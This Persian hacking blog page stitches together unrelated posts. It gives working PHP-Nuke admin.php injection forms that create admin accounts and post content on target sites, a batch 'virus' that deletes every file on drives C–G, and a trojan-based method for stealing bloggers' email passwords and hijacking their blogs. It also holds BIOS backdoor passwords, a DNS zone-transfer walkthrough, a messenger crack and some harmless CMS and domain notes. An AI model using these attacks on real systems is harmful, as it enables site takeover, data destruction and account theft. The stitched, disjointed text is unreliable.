+ نوشته شده در چهارشنبه بیست و سوم اسفند 1385ساعت 13:20 توسط >< S I L V E R G U N
|
| تبليغات | X |
Digital Security team
|
يكي از نقطه ضعف هاي Sql رشته ي ساختار آن ميباشد كه هميشه آسيب پذير بوده و مورد حمله قرار ميگيرد اين آموزش به شما روشهايي ياد ميده كه بتوانيد اين ساختار را مورد حمله قرار بدهيد . |
؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و...
به نظر من ساده ترین راه هک کردن و دیفیس کردن سایتها استفاده از باگ های phpnuke هست که به شما اجازه میده به ساده ترین راه به سایت نفوذ کنید..
من برای شما دوستان میخوام چند تا باگ جدید رو بزارم تا ازشون استفاده کنین.
برای شروع به گوگل برید (www.google.com) و بعد باید دنبال سایت هایی که از سیستم phpnuke استفاده میکنن بگردید , شاید بگید چه جوری؟
برای این کار کافیه این نوشته رو کپی و پیست کنید.
كد:
modules.php?name=Downloads
این ماژول در تمامی ورژن های php nuke وجود داره.
خوب بعد از این کار گوگل کلی سایت که از سیستم phpnuke استفاده میکنن میاره
برید رویه یکی از لینکها کلیک کنید وقتی سایت باز شد باید ببینید که شاخه phpnuke چیه
ممکنه به این شکلها باشه:
كد:
http://www.sitename.com/phpnuke/mod...?name=Downloads www.sitename.com/html/modules.php?name=Downloads http://www.sitename.com/portal/modu...?name=Downloads www.sitename.com/modules.php?name=Downloads
برای اینکه بتونیم از این روش سایتها رو هک کنیم باید فایل admin.php رو سایت باشه
برای اینکه بدونین هست یا نه
كد:
modules.php?name=Downloads
اینو پاک کنین و جاش بنویسید admin.php
مثلآ:
كد:
www.sitename.com/admin.php
اگه صفته وارد کردن نام کاربری و پسورد اومد یعنی وجود داره و اگه هم با Error برخورد کردید معلوم میشه که مدیر سایت فایل admin.php رو برداشته.
اگه admin.php بود که به مرتله بعدی میرید اگر هم نبود اون سایت رو بی خیال شید.
خوب تالا ما فرض میکنیم که admin.php وجود داره.
من به شما چند تا باگ میدم که از طریق اونا شما بتونین به سیستم مدیریت سایت نفوذ کنید و به راتتی بتونین سیستم مدیریت سایت رو به دست بگیرید.
شما برای اجرای این کد ها Notepad رو باز کنید کد رو داخلش بنویسید و از منویه File گزینه Save As.. رو انتخاب کنید و هر کجا که میخواین با نام دلخواه تون Save کنید البته بعد از اینکه نام فایل رو نوشتید پسوند اونو .HTML بزارید.
بعد فایلتونو داخل Notepad باز کنید و به جای [sitename] آدرس سایتی رو که میخواین هک کنین رو بنویسید.
کد اول: با استفاده از این میتونین داخل سایت یه کاربر با امکانات ادمین سایت ایجاد کنید و سپس
وارد سیستم مدیریت سایت بشید و سایت رو هک کنید.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>
کد دوم: با این کد میتونین یه خبر رو بدونه ورود به سیستم مدیریت به سایت بفرستید.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="add_title"> <br> CONTENT: <textarea name="add_content" rows=10 cols=50></textarea> <br> DATE: <input type="text" name="add_mdate"> <br> E-MAIL: <input type="text" name="add_expire"> <br> <input type="hidden" name="add_expire" value="0"> <br> <input type="hidden" name="add_active" value="1"> <br> <input type="hidden" name="add_view" value="1"> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="addmsg"> </p> <p> <input type="submit" name="Submit" value="Post this message"> <br> </p>
کد سوم: این کد هم تقریبآ مثل کد بالا عمل میکنه.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="title"> <br> CONTENT: <textarea name="content" rows=10 cols=50></textarea> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="massmail_send"> </p> <p> <input type="submit" name="Submit" value="Send to target site newsletter"> <br> </p> </form>
خوب اینم از آموزش هک کردن سایتهای popnuke از این روش
امیدوارم به کارتون بخوره
اگه کسی روش دیگه ای بلد هست اینجا بگه ممون
راستی اگه می خواین سایت های ایرانی که از php nuke استفاده می کنند را پیدا کنید کافیه
به googel برید و عبارت Farsi project by PHP-Nuke را بنویسید .
آشنایی با تلنت
پورتال چیست؟
سیستم مدیریت محتوا(Content Management System)
تعریف مدل:
تعریف این مدل به شما این امکان را می دهد تا از الگو و ساختارهای مشابه که قبلا ساخته شده اند، برای:
* درک بهتر از شناخت نیاز
* درک بهتر از راهبردها
* درک بهتر از چگونگی !رفع نیازها
استفاده نمود. توجه با مدلهای مشابه دارای مزیتهای ذیل خواهد بود:
* استفاده از تجارب دیگران
* عدم برخورد با مشکلات پیش بینی نشده
* حفظ سرمایه و زمان
* جلوگیری از سعی و خطاهای کورکورانه
* یافتن ایده های جدیدی که در بوته آزمایش موفق بوده اند
* و هزاران مزیت دیگر
بحث فرهنگی:
باید توجه داشت که شناخت صحیح از یک نیاز و طراحی دقیق سیستم مناسب برای رفع آن نیاز، مستلزم فعالیت مستقیم مدیران در تمامی قسمتهای مختلف آن سیستم است.
درصورت عدم فعالیت مدیران و طراحان، حتی در یک بخش کوچک، باعث عدم شناخت از آن بخش شده و مانند یک سوراخ بسیار کوچک در یک سد بزرگ، در دراز مدت منجر به فروپاشی آن خواهد گردید.
):
یک CMS عموما شامل موارد زیر است:
* پردازش ها و جریان های کاری که متضمن موارد ذیل هستند:
o سازماندهی
o دسته بندی
o ساختاردهی به منابع اطلاعاتی، به نحوی که بتوان آن ها را(برای همه اطلاعات به طرق مختلف):
+ جمع آوری
+ ذخیره
+ مرتب
+ کد بندی
+ مونتاژ
+ به روز رسانی
+ و محافظت کرد.
* از سیستم یا نرم افزار مدیریت محتوا در موارد زیر استفاده می شود:
o جمع آوری
o مدیریت
o نشر محتوا
o ذخیره محتوا به صورت جزئی یا کلی با حفظ ارتباطات بین اجزاء
o کمک به کنترل بازبینی محتوا
CMS چیست؟
* CMS تر کیبی است از:
o پایگاه داده حجیم
o سیستم فایل
o و سایر ماجول های نرم افزاری
* که برای این موارد استفاده می شود:
o ذخیره و بازیابی
o مقادیر عظیم اطلاعات زنده
CMS فقط این نیست که:
* سیستم های پایگاه داده ای از این نظر که بتوانند داده های از انواع مختلف:
o متن
o کلیپ های صدا
o کلیپ های تصویر
o فیلم را شاخص گذاری کرده
* و کاربران بتوانند اطلاعات مرتبط CMS موجود در پایگاه داده را با استفاده از این موارد برای:
o کلمات کلیدی
o نویسندگان
o تاریخ ایجاد و ... جستجو کنند
* مدیرت محتوا در کل زمان حیات CMS کاربرد اصلی آن یعنی از ایجاد تا نشر است.
سیستم مدیریت محتوای مبتنی بر وب شما را قادر می سازد که:
o یک شمای واحد و یکنواخت در کل شبکه ایجاد کنید
o امکان نشر و به روزرسانی محتوا را با استفاده از ابزار ساده و در عین حال قدرتمند مبتنی بر مرورگر به تولید کنندگان محتوا می دهد
o در کنار سایر برنامه های کاربردی امکان ارائه اطلاعات از طریق وب را می دهد
* در سیستم مدیریت محتوا سه دسته کاربر وجود دارند:
1. نویسندگان (ایجاد محتوا روی وب)
2. مدیران محتوا (چه محتوایی و کجا منتشر شود)
3. منتشران محتوا (نظر محتوا روی وب)
* CMS به شما امکان می دهد که:
o نویسندگان غیر فنی و ویرایشگران بتوانند به راحتی و در اسرع وقت محتوای خود را منتشر کنند. این کار بدون استفاده از CMS می بایست توسط متخصصین انجام بگیرد
* یک CMS موارد زیر را برقرار می سازد:
o تعریف روند نشر
o امتیازات ویژه نشر به افراد مختلف
o کاهش زمان نشر
* این موارد را می توان به صورت زیر خلاصه کرد:
o صفحات ساده برای ارائه معمولی
o صفحات پیچیده با طرح های ویژه
o اطلاعات پویای موجود در پایگاه داده به صورت مرتب تغییر می کنند
o آموزش
o راهنمای Online
o مدارک عمومی
o هزاران صفحه در زمینه های مختلف برای کاربران متفاوت
o انبوهی از ارتباطات بین صفحات
اجزای اصلی یک CMS عبارتند از:
* مدیریت تولید محتوا
* مدیریت کاربران
* مدیریت سرویس ها
* مدیریت سطوح کاربری
* مدیریت زیبایی و کارایی محتوا
CMS عملی؟
نیاز کامپیوتری نیاز محتوا
نرم افزار سخت افزار رشد
شکل 1 شکل 2 شکل 3
افشاي هكرها
هدف ما اين است كه با افشاي “ترفندهاي هكر” استفاده كنندگان از اينترنت با دانش و ابزارهاي مورد نياز، آمادگي بهتري پيدا كنند تا فريب ترفندهاي هكر را نخورند.
پسوندهاي پنهان فايلهاي ويندوز
ممكن است از اين موضوع آگاهي نداشته باشيد، اما حتي اگر به ويندوز بگوييد كه تمام پسوندهاي فايل را نشان دهد، هنوز هم فايلهايي وجود دارند كه بطور پيش فرض مخفي شدهاند. همچنين هر برنامه نصب شدهايي ميتواند پسوندها را پيكربندي كند تا پنهان شوند. در اينجا در مورد چگونگي انجام اين كار و همچنين دليل اينكه چرا برخي از پسوندهاي پنهان ميتوانند براي تعدادي از كاربرهاي كامپيوتر خطرناك باشند، مثالهايي آورده شده است. به فرض اينكه شما قبلا ويندوز explorer را براي نشان دادن تمام پسوندهاي پيكربندي كردهايد.
ازکار انداختن پسورد Bios
اينم ترفندي هم اينچنين است ما براي مارک ها و مدلهاي مختلف Bios رمزهاي عبوري معرفي مي کنيم که اميدواريم مشکل شما را حل کند و نيازي به بالا رفتن از ديوار نداشته باشيد.
بسياري از شماها هنگام روشن کردن کامپيوتر قبل از آنکه سيستم عامل خاصي بالا بيايد به سد محکمي با نام رمز عبور BIOS برخورد کرده ايد. رمز عبوري که بر خلاف ساير رمز عبورها به هيچ وجه در هارد ديسک کامپيوتر ذخيره نميشود. يا همين مشکل موقعي که مي خواهيد مشخصات Setup نامپيوتر را عوض کنيد پيش ميآيد. اين مقاله به معرفي چند روش براي حل اين مشکل ميپردازد. فرض ما بر اين است که شما رمز عبور کامپيوتر خود را فراموش کرده ايد و دنبال راه حل هستيد و قصد اذيت کردن و دست بردن در کامپيوتر کسي را نداريد.
روش اول:
W, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
رمزهاي عبور زير را بر هر نوع Bios ميتوانيد امتحان کنيد
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
توجه داشته باشيد که هنگام وارد کردن رمزهاي عبور حروف بزرگ را بصورت بزرگ و حروف کوچک را بصورت کوچک وارد کنيد.
روش دوم : يک روش نرم افزاري براي پاک کردن رمز عبور
اگر هنگامي که کامپيوتر روشن است بدان دسترسي داريد ميتوانيد از برخي نرم افزارهاي موجود براي پاک کردن رمزعبور استفاده کنيد ولي از آنجا که مکن است شما به اين نرم افزار ها دسترسي نداشته باشيد روش زير را به شما معرفي ميکنيم.
کامپيوتر را به حالت MS DOS برگردانيد و دستور DEBUG را اجرا کنيد
0 براي مدلهاي مختلف BIOS عبارات زير را وارد کنيد
AMI/AWARD BIOS
O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
O 70 2E
O 71 FF
Q
توجه کنيد که حرف اول برابرحرف "“O است نه عدد صفر.
روش سوم : روش سخت افزاري
اگر هنگامي که کامپيوتر روشن است به آن دسترسي نداريد يا رمز عبورهاي قبلي کارساز نبود مي توانيد از روشهاي سخت افزاري زير استفاده کنيد.
0 استفاده از Jumper ها
بر روي تمام مادربردها يک Jumper است که از آن براي پاک کردن CMOS ميتوانيد استفاده کنيد.کنار اين jumper معمولا اين عبارت ديده ميشود Clr CMOS.
تنها کاري که شما ميکنيد اين است که jumper را از پايه 1و2 درآورده و به پايه 3و4 نصب کنيد و دوباره به حالت اول برگردانيد. شما به همين سادگي ميتوانيد رمز عبور را پاک کنيد.
0 در آوردن باتري
ميتوانيد باتري دستگاهتان را که روي مادربرد است درآورده و دوباره جا بياندازيد در اين حالت تمام اطلاعات CMOS به حالت پيش فرض برميگردد. ولي توجه داشته باشيد که جا انداختن باتري کمي مشکل است.
0 عوض کردن آي سي (Chip) CMOS
اگر هيچ يک از روشهاي الا جواب نداد ميتوانيد آي سي CMOS را با يک آي سي از همان نوع عوض کنيد يا از نوع برنامه ريزي کنيد اينکار ابزار مخصوصي دارد و شرکتهاي تعمير کامپيوتر براي شما اينکار را خواهند کرد
توجه:
براي پيدا کردن آي سي CMOS ميتوانيد به دفترچه مادربرد خود مراجعه کنيد.
در اين روشها علاوه بر اينکه رمز عبور را پاک ميکنيد ساير اطلاعات نيز به حالت اوليه برميگرد ولي نگران نباشيد مشکلي نيست و شما ميتوانيد دوباره مشخصات کامپيوتر خود را در Setup وارد کنيد .
يك روش توپتر
کامپيوتر را به حالت MS DOS برگردانيد و دستور A:\>DEBUG را اجرا کنيد
-o7 10
-o71 10
Q
pass اول بايوس را مي پراند
ساختار سیستم فایلها در Unix
در طی این مقاله میخوام ساختار فایل ها را در سیستم عامل Unix توضیح بدم :
در Unix و نسخه های سازگار با آن فایل ها دارای ساختار خاصی میباشند .
به همین دلیل اگر شما میخواهید یک نفوذگر حرفه ای باشید باید از ساختار فایلهای مبتنی بر سیستم عامل Unix و نسخه های سازگار با آن نظیر FreeBSD , Linux و ... مطلع باشید تا بتوانید به عنوان یک نفوذگر حرفه ای از آنها بهره ببرید .
خوب مطلب را از همین جا آغاز میکنیم :
در راس سیستم فایل Unix شاخه root قرار دارد که به سادگی هر چه تمامتر با علامت "/" مشخص میشود . root یا "/" به عنوان سر شاخه همه فایل ها در یونیکس و نسخه های سازگار با آن به حساب می آید .
این سیستم فایل شامل تمام فایلهای سیستمهای و کاربردی و تمام برنامه های مورد نظر برای راه اندازی و بوت سیستم میباشد .
این سر شاخه (root ) دارای یک سری زیر شاخه میباشد که زیر شاخه ها شامل محتویات شاخه اصلی میباشند .
حال میخواهیم این زیر شاخه ها را به شما معرفی و شما را از طرز کار آنها آگاه کنیم .
قبل از هر چیز سر شاخه و زیر شاخه های سیستم عامل Unix را برایتان مشخص میکنم .
/ "root"
bin dev etc home lib mnt proc tmp usr var
ساختار درختی سیتم فایل در
Unix بدین صورت میباشد .خوب حالا به معرفی تک تک این فایلهای سیستم میپردازیم و کار هر کدام از آنها را مختصرا خدمت شما عزیزان شرح میدهم .
1 . شاخه / یا
root : شاخه ریشه و بالاترین شاخه در سیستم فایل سیستم عامل Unix میباشد .شامل تمامی فایلهای سیستمی و کاربردی از جمله درایورهای سخت افزاری و فایلهای اجرایی و .... میباشد که در برگیرنده کل سیستم فایل
Unix میباشد و وجود آنها الزامی میباشد .
2.شاخه
/bin یا در بعضی از نسخه ها /sbin : این زیر شاخه یکی از مهمترین زیر شاخه های موجود در root میباشد و تمامی فایل های اجرایی مهم و مربوط به راه اندازی سیستم در آنها موجود میباشد و وجود این زیر شاخه در Unix برای بوت شدن سیستم الزامی میباشد .
3.شاخه
:/dev این شاخه در برگیرنده تمامی درایورها و راه اندازهای سخت افزارهای متصل یه کامپیوتر میباشد این سیستم فایل برای استفاده از قطعات سخت افزاری و هر دستگاه جانبی لازم میباشد .
4.
/etc : این سیستم فایل یکی دیگه از زیر شاخه های سر شاخه root میباشد و شامل تمامی تنظیمات و Configuration ها بوده و تمامی کلمات عبور و آدرسهای شبکه و تنظیمات مربوط به فایل boot میباشد .
5.
/home : در این شاخه برای هر کاربر یک زیر شاخه اصلی تعریف میشود و هر کاربر در محیط Unix باید حداقل یک شاخه برای ذخیره و بازیابی اطلاعات شخصی خود داشته باشد .
6.
/mnt : این زیر شاخه محل ذخیره فایلهایی است که قادرند یک سیستم فایل دیگر را به صورت موقت به درون سیستم فایل اصلی یونیکس Mount کنند .
7.
/proc :تصویر حافظه از پروسه هایی که در حال حاضر روی سیستم در حال اجرا میباشند .
8.
/tmp : این شاخه در بر گیرنده فایلهایی است که برای بوت شدن سیستم نیاز میباشند و به طور موقت ایجاد میشوند و با Shut Down شدن سیستم از بین میروند .
9./usr : در این شاخه کلیه سرویسهای که باید به کابر داده شود و نیز فایلهای حیاتی و بنیادی ذخیره میشوند . خود این شاخه شامل سه قسمت میباشد :
/usr/bin -
: در برگیرنده فایلهای سودمند و اجرایی که نیاز به آنها ضروری میباشند .-/usr/man : شامل فایلهای مربوط به کتابخانه زبان C میباشد .
- /usr/sbin : شامل برنامه های اجرایی مختلف و بسیار مهم برای مدیریت سیستم .
10./var : در برگیرنده فایلهایی است که به طور متناوب در حال تغییر میباشند و برای اهداف مدیریتی سودمند میباشند .
امیدوارم این مقاله برای شما مفید باشه .
|
Port |
IP Address |
|
8080 |
195.175.37.6 |
|
8080 |
217.110.71.114 |
|
8080 |
195.175.37.23 |
|
8080 |
210.187.110.230 |
|
8080 |
61.107.109.130 |
|
8080 |
62.231.38.245 |
|
8080 |
211.126.196.172 |
|
8080 |
62.190.148.33 |
|
8080 |
202.134.0.136 |
|
8080 |
203.197.203.35 |
|
81 |
200.69.129.242 |
درس چهارم
خب حالا ما اين اطلاعات رو پيدا کرديم با اينا چی کار کنيم؟
خب عزيزان(تحويلم بگيرين)بعد از استفاده از اون کاری که در درس قبل گفتم می رسيم به چگونگی استفاده از اين اطلاعات خب يه دور اين زيريا رو مرور کنين تا من برگردم
در اين جور اطلاعات می توانيد قسمت های زير را بيابيد
نام شرکت
نام حوزه
آدرس آی پی
و يه سری اطلاعاتی که به درد ما نمی خوره(اين اطلاعات رو سايت زير می ده برين ببينين)در اينجا يه سری اطلاعات در مورد نام و اين جور مسايل داده می شه که زياد مورد استفاده قرار نمی گيره
در واقع مبحثی که من بالا مطرح کردم مبحث تکميلی درس قبل بود می دونين ديگه اما درس جديد از اينجا شروع می شه نه از اون جا حالا اينا رو هم بخونين ضرر نداره
اگه شما از اينترنيک استفاده کرديد که سط آخر نوشته دی اِن اِس و جلوش آدرس آی پی رو نوشته شما با استفاده از اون می تونين به ادامه ی کار بپردازيد اما چون اين سايت تز همه راحت تر و در عين حال کامل تر بود براتون می گم خب حالا کار های زير رو روش انجام بدين و نتيجه رو ببينين
در خط دی اِن اِس سرور نام سرور ها نوشته شده است مثلا سرور1،سرور2 و ....حالا شما با استفاده از دستورات زير می تونين يه اطلاعات ديگری به دست بيارين حالا شروع می کنيم
کامنت پرومنت را باز کنيد و دستورات زير را درونش بنوسيد
c:\>nslookup
با تايپ دستور زير نتايج زير حاصل می شود خودتون ببينيد
*** Can't find server name for address 192.168.20.3: Non-exi...
*** Can't find server name for address 192.168.20.1: Non-exi...
*** Default servers are not available
Default Server: UnKnown
Address: xxx.yyy.zzz.nnn
>
دقت کنيد که علامت > را حتما داشته باشه بعد از اين کار هم دستو زير را تايپ کنين تا يه چيز جديد ياد بگيرين
> server dns_server
شما به جای دی اِن اِس_سرور نام دی اِن اِس سروری که در کار قبل ياد گرفتين و حتما انجام دادين را بزارين بعد از زدن اينتر نتايج زير حاصل می شود
Default Server: site name.com
Address: xxx.yyy.zzz.nnn
در جاهايي که سايت نيم نوشتم چون ممکنه تغيير بکنه برای همين همه رو يکی نوشتم
بعدش اينو بنويسين اگه خطا گرفت دوباره دستور را تايپ کنين و يا از يکی ديگه سرور لستفاده کنين
> set type=any
حالا بستگی داره خطا بگيره يا نه اگه گرفت از بقيه اينا استفاده کنين اما اگه نگرفت اينا رو ادامه بدين
> ls -d site_name .
و درآخر هم اينا رو گير ميارين حال بماند به چه کار ميان
[s1.site name.com]
site name.com. SOA s1.site name.com admin.site name.com.
(2002070412 3600 600 86400 3600)
site name.com. A xxx.yyy.zzz.nnn
site name.com. NS s1.site name.com
site name.com. NS s2.site name.com
site name.com. MX 10 mail.site name.com
site name.com. MX 15 site name.com
ftp CNAME xxx.yyy.zzz.nnn
www CNAME site name.com
site name.com. SOA s1.site name.com admin.site name.com.
(2002070412 3600 600 86400 3600)
>
تعداد بسیاری از عزیزان یه Domain خریده بودن و می خواستند به وبلاگشون در میهن بلاگ وصل کنن که نمی دونستن چطور این کار رو انجوم بدن .
منم تصمیم گرفتم آموزش کاملشو بدم تا این مشکل بعضی از شما هم حل شه .
برای وصل کردن یک Domain به وبلاگ خود مرحله به مرحله کارهای زیر رو انجوم بدید:
1) ابتدا پسورد Domain خود رو از شرکتی که اون Domain رو گرفتید دریافت کنید .
2) سپس به آدرس زیر برید :
https://www.onlinenic.com/cgi-bin/english/correct_domain_new.cgi
پس از ورود به این صفحه باید دوماین و پسوردشو در کادر مربوطه وارد کنید و روی دکمه ی MODIFY کلیک کنید . مثل زیر :
3) اگه دوماین و پسورد رو درست تایپ کرده باشید ، به کنترل پنل دوماینتون وارد می شید .
در قسمت بالای کنترل پنل دوماین دو کادر DNS وجود داره که باید مثل زیر پرشون کنید :
بعد از وارد کردن DNS های میهن بلاگ تنظیمات رو ذخیره کنید . ( یعنی روی دکمه ی پایین صفحه کلیک کنید )
توجه : DNS های قبلی که در این کادر ها بوده مربوط به هاستتون هست ( اگه با دوماین هاست گرفته باشید ) . با حذف اونا و جایگزینی DNS های میهن بلاگ دوماین از رو اون هاست به میهن بلاگ منتقل میشه .
توجه داشته باشید که انتقال DNS دوماین بین 24 تا 48 ساعت طول میکشه .
4) خوب تا حالا DNS میهن بلاگ رو گذاشتین رو دوماینتون . حالا برید به کنترل پنل وبلاگتون در میهن بلاگ .
وارد صفحه ی وصل کردن وبلاگ به دوماین بشید و روی دکمه ی دوماین جدید کلیک کنید.
بعد دوماینتونو بدون www و //:http در کادر وارد کنید و اینتر بزنید . مثل زیر :
5) بعد از انجام این مراحل 24 ساعت صبر کنید تا DNS منتقل بشه .
اگه همه ی مراحل رو به دقت و همونطوری که گفتم انجام داده باشید با وارد کردن دوماینتون به وبلاگتون میرید .
ابتدا از منوی Start گزینه ی Run رو انتخاب کنید . داخل پنجره ی Run تایپ کنید Regedit و در پنجره ی باز شده به آدرس زیر بروید :
HKEY_ Current_ User > Software > Microsoft > Windows > Current Version > Policies > Explorer
پس از اینکه به آدرس فوق رفتید در قسمت سمت راست پنجره ، راست کلیک کنید و از منوی New گزینه ی DWORD value را انتخاب کنید. می بینید که یک فایل ساخته می شود که شما باید نام آن را NoDrives بگذارید:
مخفی کردن همه ی درایو ها :
حال اگر می خواهید تمام درایوهای خود را غیب کنید فایل NoDrives رو که تازه ساختید باز کنید و در اون تایپ کنید: 3FFFFFF .
پس از انجام این کار کامپیوتر را ریستارت کنید . می بینید که تمام درایوهای شما غیب شده اند .
مخفی کردن فقط یکی از درایو ها :
اگر می خواهید فقط یکی از درایو های خود را مخفی کنید ، پس از اینکه فایل NoDrives رو ساختید و بازش کردید ، با توجه به جدول زیر ، با نوشتن عدد روبروی هر درایو در فایل NoDrives می تونید اون درایو رو حذف کنید.
مثلا اگر می خواهید درایو C رو حذف کنید فایل NoDrives رو باز می کنید و در اون عدد 4 رو تایپ می کنید و اینتر میزنید . برای حذف درایو A عدد 1 و برای حذف درایو F عدد 32 رو تایپ می کنید و ...
برای حذف هرکدام از درایو ها از عدد روبروی اون در زیر استفاده کنید :
|
Drive A => 1 |
توجه : اگر خواستید درایوهاتون رو دوباره ظاهر کنید و از حالت مخفی در بیارید به همون آدرس بالا برید و فایل NoDrives رو که ساخته بودید حذف کنید .
حتما به فکر این افتادید که با چند تا ID وارد یاهومسنجر بشید . این برنامه باحجم بسیار کم این امکان رو برای شما به وجود میاره . اینم بگم که روی همه ی ورژن های مسنجر از جمله ورژن های 6 به بالا کار میکنه و 100% تست شده ست . برای استفاده از این برنامه و وارد شدن با چند ID در یاهومسنجر برنامه رو دانلود کنید :
حجم : 6 کیلوبایت زمان دانلود : 3 ثانیه
ابتدا مسنجر رو ببندید و خارج کنید. پس از باز کردن این برنامه ( کرک یاهو مسنجر ) فایل اجرایی YPager.exe رو وارد برنامه کنید و روی !Crack it کلیک کنید . از این به بعد هر دفعه که رو مسنجر کلیک کنید تو یه پنجره ی جدید باز میشه و می تونید با چند ID وارد بشید .
هنگام وصل شدن به اینترنت ممکن است با یک سری از پیغام های خطای مودم مواجه شوید كه من در اينجا به اشاره آنها مي پردازم
{600} شماره گيري مجدد در هنگام شماره گيري مودم
{601} راه اندازي port بي اعتبار مي باشد
{602} راه انداري مجدد كامپيوتر جهت بستن پرت باز شده
{603} بافر شماره گيري بيش از حد كوچك است
{604} اطلاعات نادرستي مشخص شده است
{605} نمي تواند اطلاعات port را معين كند
1838 1503
1850 1500
1848 1499
1839 1543
پرت اول : مادربورد قرباني رو ميسوزونه
پرت دوم : كارت گرافيك قرباني رو پر مي كنه
پرت سوم : شيشه مانيتور قرباني رو ميسوزونه
پرت چهارم : دستگاه رو داغون مي كنه
این آخرین آموزش هک سایت
آموزش هک کردن سایت بدون برنامه
آموزش هک سایتهای PHP Nuke
به نظر من ساده ترین راه هک کردن و دیفیس کردن سایتها استفاده از باگ های phpnuke هست که به شما اجازه میده به ساده ترین راه به سایت نفوذ کنید..
هرگونه استفاده غير متعارف از اين ويروس به عهده كاربر مي باشد.
متن ويروس:
ATTRIB -a -s -h -r c
ATTRIB -a -s -h -r c:\windows\*.*
Echo y | echo a | Echo y | del c:\*.*
Echo y | echo a | Echo y | del d:\*.*
Echo y | echo a | Echo y | del e:\*.*
Echo y | echo a | Echo y | del f:\*.*
Echo y | echo a | Echo y | del g:\*.*
echo y | copy *.* C:\
echo y | copy *.* D:\
echo y | copy *.* E:\
echo y | copy *.* F:\
echo y | copy *.* G:\
resrart
اين مطالب را داخل نت پد بنويسيد و با پسوند bat سيو كنيد.
برنامه Yahoo messenger 7 قابليتي داره كه توسط اون مي تونيد با كسي كه درحال چت هستيد بدون هيچ نرم افزاري اونو بوت كني و طرف هيچ چاره اي جز رستارت كردن كامپيوتر نداره .
طريقه كار بدين صورته كه در ابتدا برنامه ياهو مسنجر را باز كرده و بر روي send an instant message رفته همانند شكل زير
غير فعال كردن پيغام هاي خطاي
Internet Explorerبراي اين كار روي آيكون اصلي Internet Explorer راست كليك كرده و Internet Option را انتخاب نماييد. سپس به آخرين سربرگ آن يعني سربرگ Advanced برويد و در قسمت Browsing تيكDisable script debugging را فعال كنيد و تيك Display a notification about every script error را برداريد. به اين ترتيب يك سايت حتي اگر مشكلي هم داشته باشد، به شما پيغام خطا نمي دهد و فقط در گوشه پايين سمت چپ يك علامت اخطار زرد رنگ كوچك نمايان مي شود كه با دوبار كليك كردن روي آن مي توانيد خطا را مشاهده كنيد.
کیلک روی >=======================>ادامه
شما بايد ايميل وبلاگ نويس را بيابيد براي اينكار ميرويد داخل وبلاگ و در قسمت پست الكترونيك يا هر عنوان ديگري مربوط به ايميل را در وبلاگ پيدا مي كنيد. حالا كه روي آن كليك كنيد ايميل وبلاگ نويس را براي شما نمايش ميدهد. دوستان توجه كنيد اگه وبلاگ نويس ايميل داخل وبلاگش نداشته باشد با اين روش نمي توانيد وبلاگ هك كنيد. فرض مي كنيم كه وبلاگ نويس ايميل دارد حالا كه فهميديم ايميل او چيست بايد به وسيله يك تروجان قوي پسورد ايميل وبلاگ نويس رو پيدا كنيم. يعني اينكه تروجان رو بعد از ساختن براي همون ايميلش سند كنيم تا وبلاگ نويس اجرايش كند و پسورد ايميلش براي شما فرستاده شود. تا اينجا شما آدرس وبلاگ قرباني آدرس ايميل قرباني و پسورد ايميل قرباني رو داريد. شما به راحتي ميتوانيد وبلاگ را هك كنيد. ما فرض بر اين داريم كه وبلاگي كه ميخوايم هكش كنيم از بلاگفا ميباشد حالا به سايت بلاگفا ميرويم و بر روي كلمه عبور خود را فراموش كرده ام كليك ميكنيم يك صفحه براي شما باز ميشود كه 2 باكس دارد شما در اولي آدرس وبلاگ را وارد كنيد و در باكس دوم ايميل وبلاگ نويس حالا دكمه را بزنيد. به همين راحتي پسورد وبلاگ براي آن ايميلي كه هك كرديد ميرود و شما با ورود به آن ايميل ميتوانيد پسورد را خوانده و حالا به وبلاگ لاگين كنيد و هر كاري دوست داشتيد انجام بدهيد.
1 . دستور Dir : كه با استفاده از آن شما مي توانيد ليست فايل هاي داخل يك درايو يا پوشه را مشاهده نماييد . اين شايد پركاربردترين دستوري باشد كه در Ms - Dos تايپ مي شود .
مثلا فرض مي كنيم ما مي خواهيم از درايو D ما يك Dir بگيريم پس تايپ مي كنيم .
D:\>dir
2 . دستور Del : براي پاك كردن يك فايل از دستور Del استفاده مي كنيم در ابتدا اين دستور و سپس نام فايلي رو كه مي خواهيم پاك كنيم مي نويسيم
براي مثال ما مي خواهيم كه Program را از درايو D پاك نماييم پس تايپ مي كنيم .
D:\>Del Program
این آخرین بار برای دوستان این هم آموزش هک سایت تو وبلاگه
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
